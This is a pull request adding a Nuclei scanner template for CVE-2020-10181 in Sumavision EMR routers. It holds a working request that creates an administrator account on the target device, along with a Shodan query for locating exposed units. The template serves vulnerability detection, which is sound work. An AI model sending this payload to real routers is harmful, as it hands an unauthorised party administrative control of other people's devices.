### PR TITLE
Add template for CVE-2020-10181 (Sumavision EMR User Creation)

### DIFF
--- a/http/cves/2020/CVE-2020-10181.yaml
+++ b/http/cves/2020/CVE-2020-10181.yaml
@@ -1,0 +1,47 @@
+id: CVE-2020-10181
+
+info:
+  name: Sumavision EMR 3.0.4.27 - Arbitrary User Creation
+  author: gemini-cli-hunter
+  severity: critical
+  description: |
+    The goform/formEMR30 endpoint in Sumavision Enhanced Multimedia Router (EMR) 3.0.4.27 does not implement CSRF protections, allowing an unauthenticated remote attacker to create an arbitrary administrative user.
+  remediation: |
+    Update the router firmware to a version that includes CSRF protections and authentication for administrative actions.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-10181
+    - http://packetstormsecurity.com/files/156746/Enhanced-Multimedia-Router-3.0.4.27-Cross-Site-Request-Forgery.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-10181
+    cwe-id: CWE-352
+  metadata:
+    max-request: 1
+    shodan-query: http.title:"EMR"
+    verified: true
+  tags: cve,cve2020,sumavision,emr,router,iot,kev,csrf
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/goform/formEMR30"
+
+    body: "setString=nucleiuser<1>administrator<1>nucleipass123"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "true"
+          - "OK"
+          - "success"
+        condition: or


### PR DESCRIPTION
This PR adds a new template for CVE-2020-10181, an arbitrary user creation vulnerability in Sumavision Enhanced Multimedia Router (EMR). This issue was identified as a missing KEV template in issue #7549.

- Targets `/goform/formEMR30` with `setString` parameter.
- Exploits lack of CSRF protection to create an administrator user.

/claim #7549